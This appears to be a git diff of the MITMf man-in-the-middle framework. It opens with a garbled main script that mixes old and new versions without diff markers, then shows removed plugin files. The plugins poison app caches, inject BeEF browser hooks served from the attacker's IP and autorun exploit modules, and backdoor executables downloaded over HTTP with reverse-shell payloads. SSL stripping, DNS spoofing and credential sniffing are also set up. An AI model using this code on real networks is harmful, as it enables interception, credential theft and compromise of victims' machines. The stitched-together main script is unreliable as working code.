mgroup.add_argument("-c", "--config-file", dest='configfile', type=str, default="./config/mitmf.conf", metavar='configfile', help="Specify config file to use")
mgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Only run plugins, disable all proxies')
#added by alexander.georgiev@daloo.de
mgroup.add_argument('-m', '--manual-iptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables or flush them automatically')
#add sslstrip options
sgroup = parser.add_argument_group("SSLstrip", "Options for SSLstrip library")
#sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).")
slogopts = sgroup.add_mutually_exclusive_group()
slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)")
slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.")
slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.")
#slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') #not fully tested yet
sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)")
sgroup = parser.add_argument_group("MITMf", "Options for MITMf")
sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
sgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on")
sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use")
sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching")
sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit')
sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
sgroup.add_argument("-F", "--filter", type=str, help='Filter to apply to incoming traffic', nargs='+')
#Initialize plugins
plugins = []
try:
for p in plugin_classes:
plugins.append(p())
except:
print "Failed to load plugin class %s" % str(p)
#Initialize plugins and pass them the parser NameSpace object
plugins = [plugin(parser) for plugin in plugin.Plugin.__subclasses__()]
#Give subgroup to each plugin with options
try:
for p in plugins:
if p.desc == "":
sgroup = parser.add_argument_group("%s" % p.name,"Options for %s." % p.name)
else:
sgroup = parser.add_argument_group("%s" % p.name, p.desc)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
sgroup.add_argument("--%s" % p.optname, action="store_true",help="Load plugin %s" % p.name)
options = parser.parse_args()
if p.has_opts:
p.add_options(sgroup)
except NotImplementedError:
sys.exit("[-] %s plugin claimed option support, but didn't have it." % p.name)
#Set the log level
logger().log_level = logging.__dict__[options.log_level.upper()]
args = parser.parse_args()
from core.logger import logger
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("MITMf", formatter)
try:
configfile = ConfigObj(args.configfile)
except Exception, e:
sys.exit("[-] Error parsing config file: " + str(e))
from core.netcreds import NetCreds
config_args = configfile['MITMf']['args']
if config_args:
print "[*] Loading arguments from config file"
for arg in config_args.split(' '):
sys.argv.append(arg)
args = parser.parse_args()
if options.read_pcap:
NetCreds().parse_pcap(options.read_pcap)
####################################################################################################
#Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object
from core.utils import get_ip, get_mac, shutdown
options.ip = get_ip(options.interface)
options.mac = get_mac(options.interface)
# Here we check for some variables that are very commonly used, and pass them down to the plugins
try:
args.ip_address = get_if_addr(args.interface)
if (args.ip_address == "0.0.0.0") or (args.ip_address is None):
sys.exit("[-] Interface %s does not have an assigned IP address" % args.interface)
except Exception, e:
sys.exit("[-] Error retrieving interface IP address: %s" % e)
settings.Config.populate(options)
try:
args.mac_address = get_if_hwaddr(args.interface)
except Exception, e:
sys.exit("[-] Error retrieving interface MAC address: %s" % e)
log.debug("MITMf started: {}".format(sys.argv))
args.configfile = configfile #so we can pass the configobj down to all the plugins
#Start Net-Creds
print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
####################################################################################################
NetCreds().start(options.interface, options.ip)
print "|"
print "|_ Net-Creds v{} online".format(NetCreds.version)
log_level = logging.__dict__[args.log_level.upper()]
from core.proxyplugins import ProxyPlugins
#Start logging
logging.basicConfig(level=log_level, format="%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
logFormatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
mitmf_logger = logging.getLogger('mitmf')
ProxyPlugins().all_plugins = plugins
for plugin in plugins:
fileHandler = logging.FileHandler("./logs/mitmf.log")
fileHandler.setFormatter(logFormatter)
mitmf_logger.addHandler(fileHandler)
#load only the plugins that have been called at the command line
if vars(options)[plugin.optname] is True:
#####################################################################################################
ProxyPlugins().add_plugin(plugin)
#All our options should be loaded now, pass them onto plugins
print "[*] MITMf v%s online... initializing plugins" % mitmf_version
print "|_ {} v{}".format(plugin.name, plugin.version)
if plugin.tree_info:
for line in xrange(0, len(plugin.tree_info)):
print "| |_ {}".format(plugin.tree_info.pop())
load = []
plugin.setup_logger()
plugin.initialize(options)
for p in plugins:
if plugin.tree_info:
for line in xrange(0, len(plugin.tree_info)):
print "| |_ {}".format(plugin.tree_info.pop())
if vars(args)[p.optname] is True:
print "|_ %s v%s" % (p.name, p.version)
if hasattr(p, 'tree_output') and p.tree_output:
for line in p.tree_output:
print "| |_ %s" % line
p.tree_output.remove(line)
plugin.start_config_watch()
if getattr(args, p.optname):
p.initialize(args)
load.append(p)
if options.filter:
from core.packetfilter import PacketFilter
pfilter = PacketFilter(options.filter)
print "|_ PacketFilter online"
for filter in options.filter:
print " |_ Applying filter {} to incoming packets".format(filter)
try:
pfilter.start()
except KeyboardInterrupt:
pfilter.stop()
shutdown()
if vars(args)[p.optname] is True:
if hasattr(p, 'tree_output') and p.tree_output:
for line in p.tree_output:
print "| |_ %s" % line
#Plugins are ready to go, start MITMf
if args.disproxy:
ProxyPlugins.getInstance().setPlugins(load)
else:
from core.sslstrip.CookieCleaner import CookieCleaner
from core.sslstrip.StrippingProxy import StrippingProxy
from core.sslstrip.URLMonitor import URLMonitor
from libs.dnschef.dnschef import DNSChef
URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
URLMonitor.getInstance().setResolver(args.configfile['MITMf']['DNS']['resolver'])
URLMonitor.getInstance().setResolverPort(args.configfile['MITMf']['DNS']['port'])
DNSChef.getInstance().setCoreVars(args.configfile['MITMf']['DNS'])
if args.configfile['MITMf']['DNS']['tcp'].lower() == 'on':
DNSChef.getInstance().startTCP()
else:
DNSChef.getInstance().startUDP()
URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
URLMonitor.getInstance().setCaching(options.preserve_cache)
CookieCleaner.getInstance().setEnabled(options.killsessions)
CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load)
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
reactor.listenTCP(options.listen_port, strippingFactory)
reactor.listenTCP(args.listen, strippingFactory)
for plugin in plugins:
if vars(options)[plugin.optname] is True:
plugin.reactor(strippingFactory)
#load custom reactor options for plugins that have the 'plugin_reactor' attribute
for p in plugins:
if getattr(args, p.optname):
if hasattr(p, 'plugin_reactor'):
p.plugin_reactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it
print "|_ Sergio-Proxy v0.2.1 online"
print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
#Start mitmf-api
from core.mitmfapi import mitmfapi
print "|"
print "|_ Sergio-Proxy v%s online" % sergio_version
print "|_ SSLstrip v%s by Moxie Marlinspike online" % sslstrip_version
print "|_ DNSChef v%s online\n" % dnschef_version
print "|_ MITMf-API online"
mitmfapi().start()
reactor.run()
#Start the HTTP Server
from core.servers.HTTP import HTTP
HTTP().start()
print "|_ HTTP server online"
#run each plugins finish() on exit
for p in load:
p.finish()
#Start DNSChef
from core.servers.DNS import DNSChef
DNSChef().start()
print "|_ DNSChef v{} online".format(DNSChef.version)
#Start the SMB server
from core.servers.SMB import SMB
SMB().start()
print "|_ SMB server online\n"
#start the reactor
reactor.run()
print "\n"
shutdown()
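
The rewritten mitmf.py above discovers plugins by instantiating every subclass of the Plugin base and handing each one the shared argparse parser. A self-contained sketch of that pattern (class and option names here are illustrative, not the framework's real ones):

import argparse

class Plugin(object):
    name, optname, desc = 'base', 'base', ''
    def __init__(self, parser):
        # each plugin registers its own option group and a --<optname> load flag
        group = parser.add_argument_group(self.name, self.desc or 'Options for {}'.format(self.name))
        group.add_argument('--{}'.format(self.optname), action='store_true', help='Load plugin {}'.format(self.name))

class Demo(Plugin):
    name, optname, desc = 'Demo', 'demo', 'Example plugin'

parser = argparse.ArgumentParser(usage='mitmf.py -i interface [mitmf options] [plugin name] [plugin options]')
plugins = [cls(parser) for cls in Plugin.__subclasses__()]   # Demo is picked up automatically
opts = parser.parse_args(['--demo'])
loaded = [p for p in plugins if getattr(opts, p.optname)]    # plugins whose flag was passed
print [p.name for p in loaded]                               # ['Demo']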

@@ -1,208 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz
import logging
import re
import os.path
import time
import sys
from plugins.plugin import Plugin
from datetime import date
from core.sslstrip.URLMonitor import URLMonitor
mitmf_logger = logging.getLogger('mitmf')
class AppCachePlugin(Plugin):
name = "App Cache Poison"
optname = "appoison"
desc = "Performs App Cache Poisoning attacks"
implements = ["handleResponse"]
version = "0.3"
has_opts = False
def initialize(self, options):
self.options = options
self.mass_poisoned_browsers = []
self.urlMonitor = URLMonitor.getInstance()
self.urlMonitor.setAppCachePoisoning()
try:
self.config = options.configfile['AppCachePoison']
except Exception, e:
sys.exit("[-] Error parsing config file for AppCachePoison: " + str(e))
def handleResponse(self, request, data):
url = request.client.uri
req_headers = request.client.getAllHeaders()
headers = request.client.responseHeaders
ip = request.client.getClientIP()
if "enable_only_in_useragents" in self.config:
regexp = self.config["enable_only_in_useragents"]
if regexp and not re.search(regexp,req_headers["user-agent"]):
mitmf_logger.info("%s Tampering disabled in this useragent (%s)" % (ip, req_headers["user-agent"]))
return {'request': request, 'data': data}
urls = self.urlMonitor.getRedirectionSet(url)
mitmf_logger.debug("%s [AppCachePoison] Got redirection set: %s" % (ip, urls))
(name,s,element,url) = self.getSectionForUrls(urls)
if s is False:
data = self.tryMassPoison(url, data, headers, req_headers, ip)
return {'request': request, 'data': data}
mitmf_logger.info("%s Found URL %s in section %s" % (ip, url, name))
p = self.getTemplatePrefix(s)
if element == 'tamper':
mitmf_logger.info("%s Poisoning tamper URL with template %s" % (ip, p))
if os.path.exists(p + '.replace'): # replace whole content
f = open(p + '.replace','r')
data = self.decorate(f.read(), s)
f.close()
elif os.path.exists(p + '.append'): # append file to body
f = open(p + '.append','r')
appendix = self.decorate(f.read(), s)
f.close()
# append to body
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
# add manifest reference
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)
elif element == "manifest":
mitmf_logger.info("%s Poisoning manifest URL" % ip)
data = self.getSpoofedManifest(url, s)
headers.setRawHeaders("Content-Type", ["text/cache-manifest"])
elif element == "raw": # raw resource to modify, it does not have to be html
mitmf_logger.info("%s Poisoning raw URL" % ip)
if os.path.exists(p + '.replace'): # replace whole content
f = open(p + '.replace','r')
data = self.decorate(f.read(), s)
f.close()
elif os.path.exists(p + '.append'): # append file to body
f = open(p + '.append','r')
appendix = self.decorate(f.read(), s)
f.close()
# append to response body
data += appendix
self.cacheForFuture(headers)
self.removeDangerousHeaders(headers)
return {'request': request, 'data': data}
def tryMassPoison(self, url, data, headers, req_headers, ip):
browser_id = ip + req_headers.get("user-agent", "")
if not 'mass_poison_url_match' in self.config: # no url
return data
if browser_id in self.mass_poisoned_browsers: #already poisoned
return data
if not headers.hasHeader('content-type') or not re.search('html(;|$)', headers.getRawHeaders('content-type')[0]): #not HTML
return data
if 'mass_poison_useragent_match' in self.config and not "user-agent" in req_headers:
return data
if not re.search(self.config['mass_poison_useragent_match'], req_headers['user-agent']): #different UA
return data
if not re.search(self.config['mass_poison_url_match'], url): #different url
return data
mitmf_logger.debug("Adding AppCache mass poison for URL %s, id %s" % (url, browser_id))
appendix = self.getMassPoisonHtml()
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip
return data
def getMassPoisonHtml(self):
html = "<div style=\"position:absolute;left:-100px\">"
for i in self.config:
if isinstance(self.config[i], dict):
if self.config[i].has_key('tamper_url') and not self.config[i].get('skip_in_mass_poison', False):
html += "<iframe sandbox=\"\" style=\"opacity:0;visibility:hidden\" width=\"1\" height=\"1\" src=\"" + self.config[i]['tamper_url'] + "\"></iframe>"
return html + "</div>"
def cacheForFuture(self, headers):
ten_years = 315569260
headers.setRawHeaders("Cache-Control",["max-age="+str(ten_years)])
headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"]) # it was modifed long ago, so is most likely fresh
in_ten_years = date.fromtimestamp(time.time() + ten_years)
headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")])
def removeDangerousHeaders(self, headers):
headers.removeHeader("X-Frame-Options")
def getSpoofedManifest(self, url, section):
p = self.getTemplatePrefix(section)
if not os.path.exists(p+'.manifest'):
p = self.getDefaultTemplatePrefix()
f = open(p + '.manifest', 'r')
manifest = f.read()
f.close()
return self.decorate(manifest, section)
def decorate(self, content, section):
for i in section:
content = content.replace("%%"+i+"%%", section[i])
return content
def getTemplatePrefix(self, section):
if section.has_key('templates'):
return self.config['templates_path'] + '/' + section['templates']
return self.getDefaultTemplatePrefix()
def getDefaultTemplatePrefix(self):
return self.config['templates_path'] + '/default'
def getManifestUrl(self, section):
return section.get("manifest_url",'/robots.txt')
def getSectionForUrls(self, urls):
for url in urls:
for i in self.config:
if isinstance(self.config[i], dict): #section
section = self.config[i]
name = i
if section.get('tamper_url',False) == url:
return (name, section, 'tamper',url)
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
return (name, section, 'tamper',url)
if section.get('manifest_url',False) == url:
return (name, section, 'manifest',url)
if section.get('raw_url',False) == url:
return (name, section, 'raw',url)
return (None, False,'',urls.copy().pop())
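
The AppCachePoison plugin above keeps its poisoned responses alive by marking them cacheable far into the future (cacheForFuture). A standalone restatement of that header trick, assuming nothing beyond the standard library:

import time
from datetime import date

def far_future_headers():
    ten_years = 315569260   # seconds, same constant as cacheForFuture()
    expires = date.fromtimestamp(time.time() + ten_years)
    return {
        'Cache-Control': 'max-age={}'.format(ten_years),
        'Last-Modified': 'Mon, 29 Jun 1998 02:28:12 GMT',   # an old date makes the cached copy look safely fresh
        'Expires': expires.strftime('%a, %d %b %Y %H:%M:%S GMT'),
    }

print far_future_headers()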

@@ -1,137 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import sys
import json
import threading
from core.beefapi.beefapi import BeefAPI
from plugins.plugin import Plugin
from plugins.Inject import Inject
from time import sleep
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
requests_log.setLevel(logging.WARNING)
mitmf_logger = logging.getLogger('mitmf')
class BeefAutorun(Inject, Plugin):
name = "BeEFAutorun"
optname = "beefauto"
desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
tree_output = []
depends = ["Inject"]
version = "0.3"
has_opts = False
def initialize(self, options):
self.options = options
self.ip_address = options.ip_address
try:
beefconfig = options.configfile['MITMf']['BeEF']
except Exception, e:
sys.exit("[-] Error parsing BeEF options in config file: " + str(e))
try:
userconfig = options.configfile['BeEFAutorun']
except Exception, e:
sys.exit("[-] Error parsing config for BeEFAutorun: " + str(e))
self.Mode = userconfig['mode']
self.All_modules = userconfig["ALL"]
self.Targeted_modules = userconfig["targets"]
Inject.initialize(self, options)
self.black_ips = []
self.html_payload = '<script type="text/javascript" src="http://%s:%s/hook.js"></script>' % (self.ip_address, beefconfig['beefport'])
beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
if not beef.login(beefconfig['user'], beefconfig['pass']):
sys.exit("[-] Error logging in to BeEF!")
self.tree_output.append("Mode: %s" % self.Mode)
t = threading.Thread(name="autorun", target=self.autorun, args=(beef,))
t.setDaemon(True)
t.start()
def autorun(self, beef):
already_ran = []
already_hooked = []
while True:
sessions = beef.sessions_online()
if (sessions is not None and len(sessions) > 0):
for session in sessions:
if session not in already_hooked:
info = beef.hook_info(session)
mitmf_logger.info("%s >> joined the horde! [id:%s, type:%s-%s, os:%s]" % (info['ip'], info['id'], info['name'], info['version'], info['os']))
already_hooked.append(session)
self.black_ips.append(str(info['ip']))
if self.Mode == 'oneshot':
if session not in already_ran:
self.execModules(session, beef)
already_ran.append(session)
elif self.Mode == 'loop':
self.execModules(session, beef)
sleep(10)
else:
sleep(1)
def execModules(self, session, beef):
session_info = beef.hook_info(session)
session_ip = session_info['ip']
hook_browser = session_info['name']
hook_os = session_info['os']
if len(self.All_modules) > 0:
mitmf_logger.info("%s >> sending generic modules" % session_ip)
for module, options in self.All_modules.iteritems():
mod_id = beef.module_id(module)
resp = beef.module_run(session, mod_id, json.loads(options))
if resp["success"] == 'true':
mitmf_logger.info('%s >> sent module %s' % (session_ip, mod_id))
else:
mitmf_logger.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
sleep(0.5)
mitmf_logger.info("%s >> sending targeted modules" % session_ip)
for os in self.Targeted_modules:
if (os in hook_os) or (os == hook_os):
browsers = self.Targeted_modules[os]
if len(browsers) > 0:
for browser in browsers:
if browser == hook_browser:
modules = self.Targeted_modules[os][browser]
if len(modules) > 0:
for module, options in modules.iteritems():
mod_id = beef.module_id(module)
resp = beef.module_run(session, mod_id, json.loads(options))
if resp["success"] == 'true':
mitmf_logger.info('%s >> sent module %s' % (session_ip, mod_id))
else:
mitmf_logger.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
sleep(0.5)

File diff suppressed because one or more lines are too long

@@ -1,46 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
from plugins.plugin import Plugin
class CacheKill(Plugin):
name = "CacheKill"
optname = "cachekill"
desc = "Kills page caching by modifying headers"
implements = ["handleHeader", "connectionMade"]
bad_headers = ['if-none-match', 'if-modified-since']
version = "0.1"
has_opts = True
def add_options(self, options):
options.add_argument("--preserve-cookies", action="store_true", help="Preserve cookies (will allow caching in some situations).")
def handleHeader(self, request, key, value):
'''Handles all response headers'''
request.client.headers['Expires'] = "0"
request.client.headers['Cache-Control'] = "no-cache"
def connectionMade(self, request):
'''Handles outgoing request'''
request.headers['Pragma'] = 'no-cache'
for h in self.bad_headers:
if h in request.headers:
request.headers[h] = ""

@@ -1,607 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
#
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
#
# Copyright (c) 2013-2014, Joshua Pitts
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Tested on Kali-Linux.
import sys
import os
import pefile
import zipfile
import logging
import shutil
import random
import string
import tarfile
import multiprocessing
from libs.bdfactory import pebin
from libs.bdfactory import elfbin
from libs.bdfactory import machobin
from plugins.plugin import Plugin
import tempfile # the module itself is used below (NamedTemporaryFile)
from tempfile import mkstemp
from configobj import ConfigObj
mitmf_logger = logging.getLogger('mitmf')
class FilePwn(Plugin):
name = "FilePwn"
optname = "filepwn"
desc = "Backdoor executables being sent over http using bdfactory"
implements = ["handleResponse"]
tree_output = ["BDFProxy v0.3.2 online"]
version = "0.2"
has_opts = False
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.patched = multiprocessing.Queue()
#FOR FUTURE USE
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']
#FOR FUTURE USE
self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
#USED NOW
self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0},
'pe': {'number': 'MZ', 'offset': 0},
'gz': {'number': '1f8b'.decode('hex'), 'offset': 0},
'bz': {'number': 'BZ', 'offset': 0},
'zip': {'number': '504b0304'.decode('hex'), 'offset': 0},
'tar': {'number': 'ustar', 'offset': 257},
'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0},
'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0},
'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0},
}
#NOT USED NOW
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
self.userConfig = options.configfile['FilePwn']
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
self.WindowsType = self.userConfig['targets']['ALL']['WindowsType']
self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86']
self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64']
self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86']
self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64']
self.FatPriority = self.userConfig['targets']['ALL']['FatPriority']
self.zipblacklist = self.userConfig['ZIP']['blacklist']
self.tarblacklist = self.userConfig['TAR']['blacklist']
def convert_to_Bool(self, aString):
if aString.lower() == 'true':
return True
elif aString.lower() == 'false':
return False
elif aString.lower() == 'none':
return None
def bytes_have_format(self, bytess, formatt):
number = self.magicNumbers[formatt]
if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']:
return True
return False
def binaryGrinder(self, binaryFile):
"""
Feed potential binaries into this function,
it will return the result PatchedBinary, False, or None
"""
with open(binaryFile, 'r+b') as f:
binaryTMPHandle = f.read()
binaryHeader = binaryTMPHandle[:4]
result = None
try:
if binaryHeader[:2] == 'MZ': # PE/COFF
pe = pefile.PE(data=binaryTMPHandle, fast_load=True)
magic = pe.OPTIONAL_HEADER.Magic
machineType = pe.FILE_HEADER.Machine
#update when supporting more than one arch
if (magic == int('20B', 16) and machineType == 0x8664 and
self.WindowsType.lower() in ['all', 'x64']):
add_section = False
cave_jumping = False
if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append':
add_section = True
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
# if automatic override
if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
cave_jumping = True
targetFile = pebin.pebin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx64['SHELL'],
HOST=self.WindowsIntelx64['HOST'],
PORT=int(self.WindowsIntelx64['PORT']),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType,
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
)
result = targetFile.run_this()
elif (machineType == 0x14c and
self.WindowsType.lower() in ['all', 'x86']):
add_section = False
cave_jumping = False
#add_section wins for cave_jumping
#default is single for BDF
if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append':
add_section = True
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
# if automatic override
if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
cave_jumping = True
targetFile = pebin.pebin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx86['SHELL'],
HOST=self.WindowsIntelx86['HOST'],
PORT=int(self.WindowsIntelx86['PORT']),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType,
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']),
PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
)
result = targetFile.run_this()
elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False)
targetFile.support_check()
if targetFile.class_type == 0x1:
#x86CPU Type
targetFile = elfbin.elfbin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.LinuxIntelx86['SHELL'],
HOST=self.LinuxIntelx86['HOST'],
PORT=int(self.LinuxIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'],
IMAGE_TYPE=self.LinuxType
)
result = targetFile.run_this()
elif targetFile.class_type == 0x2:
#x64
targetFile = elfbin.elfbin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.LinuxIntelx64['SHELL'],
HOST=self.LinuxIntelx64['HOST'],
PORT=int(self.LinuxIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'],
IMAGE_TYPE=self.LinuxType
)
result = targetFile.run_this()
elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
targetFile.support_check()
#ONE CHIP SET MUST HAVE PRIORITY in FAT FILE
if targetFile.FAT_FILE is True:
